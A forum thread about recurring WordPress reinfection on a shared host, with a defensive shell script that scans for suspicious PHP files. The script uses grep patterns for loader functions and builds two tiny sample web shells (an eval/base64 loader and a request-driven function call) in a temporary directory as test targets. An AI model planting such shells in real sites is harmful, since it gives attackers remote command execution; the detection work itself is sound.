January 22, 2021

Trying to figure out a wordpress hack

Shared server. Multiple WordPress installations. All hacked with malware that changes all themes to open a random ad-based site.

Changed cPanel password, WP passwords, clean-installed all WP sites. Malware comes back within a week to all of them, or at least 50% of them.

Tried all manner of security plugins and .htaccess rules. Server logs that I could access showed nothing too suspicious. No logins aside from me.

Finally tried 2-factor and everything stopped. There were quite a few attempted logins for the first few days, but all stopped due to 2-factor. Banned the IPs and of course they tried again with the right user name, but the 2-factor stopped them.

I’m trying to figure out how they kept getting in so easily even after clean installs, new passwords, and even lockouts after 3 bad passwords.

2-factor stopped them. I can only think it was brute force, but the 3-attempts-and-you’re-out should have stopped that. The only other thing I can think of is that it was server malware, but again, the 2-factor wouldn’t have mattered then.

Anyone else have ideas on how they were able to get in before 2-factor, given the above?

Comments

eddyht

Are WordPress and all of the plugins up to date? It could be a vulnerability in one of the plugins. Also, it’s good practice to review all of the PHP files in the public directory. Sometimes malicious files are uploaded to allow for persistent access after WordPress is gone.

Another area to check is FTP accounts in cPanel. See if there are any accounts that you didn’t create.
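The PHP file review eddyht recommends is worth scripting, because on a shared host the planted files are what survive a "clean install" that only replaces core and themes. The script below is an added example for this thread, not code from eddyht, the original poster, or any WordPress tool. It runs three first-pass heuristics a responder would apply to a document root: PHP files under wp-content/uploads (an uploads directory should never contain code), PHP files that contain common obfuscation or request-driven call patterns, and PHP files modified within the last N days. The sample site tree it builds in a temporary directory, including the two planted web shells and their contents, is constructed for the demo; the regex is a triage filter and will need review of every hit, not a verdict.

```shell
#!/bin/sh
# Added example (not from the original thread): triage a WordPress document
# root for PHP files that should not be there. Paths and file contents in
# make_sample_site are constructed for this demo.

# 1. Any PHP under wp-content/uploads is a finding by itself: that tree is
#    meant to hold media, and web-shell droppers love it because it is writable.
php_in_uploads() {
    root="$1"
    [ -d "$root/wp-content/uploads" ] || return 0
    find "$root/wp-content/uploads" -type f -name '*.php'
}

# 2. PHP files containing typical loader primitives (eval/base64/gzinflate/...)
#    or a variable-function call fed directly from request input, e.g.
#    $f($_REQUEST["y"]). Legitimate plugins rarely do either; every hit still
#    needs a human look.
suspicious_php() {
    root="$1"
    pattern='(eval|base64_decode|gzinflate|gzuncompress|str_rot13|create_function)[[:space:]]*\(|\$[A-Za-z_][A-Za-z0-9_]*[[:space:]]*\(\$_(POST|GET|REQUEST|COOKIE)'
    # grep exits 1 on no match and find propagates that; neither is an error here.
    find "$root" -type f -name '*.php' -exec grep -lE "$pattern" {} + 2>/dev/null || true
}

# 3. PHP files changed in the last N days. After a reinstall, anything newer
#    than the reinstall that you did not put there is worth opening.
recently_modified_php() {
    root="$1"
    days="${2:-7}"
    find "$root" -type f -name '*.php' -mtime -"$days"
}

# Build a constructed sample document root: two legitimate files (one of them
# with an old mtime) and two planted shells in places attackers actually use.
make_sample_site() {
    root="$(mktemp -d)"
    mkdir -p "$root/wp-content/uploads/2021/01" \
             "$root/wp-content/themes/twentytwenty" \
             "$root/wp-includes"
    printf '<?php\n// legitimate theme bootstrap\nfunction tt_setup() { add_theme_support("title-tag"); }\n' \
        > "$root/wp-content/themes/twentytwenty/functions.php"
    printf '<?php\n// legitimate core file, untouched for a long time\nfunction wp_version() { return "5.6"; }\n' \
        > "$root/wp-includes/version.php"
    touch -t 202001010000 "$root/wp-includes/version.php"
    # Planted shell 1: classic eval/base64 loader hidden in uploads.
    printf '<?php\n@eval(base64_decode($_POST["c"]));\n' \
        > "$root/wp-content/uploads/2021/01/wp-cache.php"
    # Planted shell 2: request-driven variable function call inside a theme.
    printf '<?php\nif(isset($_REQUEST["x"])){$f=$_REQUEST["x"];$f($_REQUEST["y"]);}\n' \
        > "$root/wp-content/themes/twentytwenty/header-tmp.php"
    echo "$root"
}

# Demo run against the constructed tree. On a real host, replace $root with
# the site's document root (e.g. public_html) and drop the rm -rf.
root="$(make_sample_site)"
echo "== PHP under wp-content/uploads (expect none on a clean site) =="
php_in_uploads "$root"
echo "== PHP with obfuscation / request-driven calls =="
suspicious_php "$root"
echo "== PHP modified in the last 7 days =="
recently_modified_php "$root" 7
rm -rf "$root"
```

Run it as `sh triage.sh` from a shell account on the host, or adapt the three functions to take `public_html` directly. Anything the first two checks report should be quarantined (move it out of the web root, do not just delete it, so the content can be inspected), and the third check narrows the review to files touched since the reinstall. The functions only read the filesystem, so they are safe to run repeatedly while watching for reinfection.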
